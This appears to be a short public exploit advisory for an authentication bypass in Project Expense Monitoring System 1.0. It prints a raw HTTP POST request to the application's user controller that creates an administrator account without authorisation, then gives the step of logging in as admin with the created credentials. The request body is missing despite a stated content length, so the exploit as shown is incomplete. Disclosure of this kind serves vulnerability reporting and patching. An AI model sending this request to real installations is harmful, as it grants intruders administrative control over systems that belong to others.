Project Expense Monitoring System 1.0 Authentication Bypass

Project Expense Monitoring System version 1.0 suffers from an authentication bypass vulnerability that allows for administrative account creation.

MD5 | 5886a72c593de669cd120484467ffafd

# Exploit Title: Project expense Monitoring System | Create Admin Account Unauthorised
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34


1. Post to application (account create)

POST /pems/module/user/controller.php?action=add HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://TARGET
Connection: close
Upgrade-Insecure-Requests: 1


2. Login at http://Target/pems/login.php with hacker:hackor as Admin with created account

Related Posts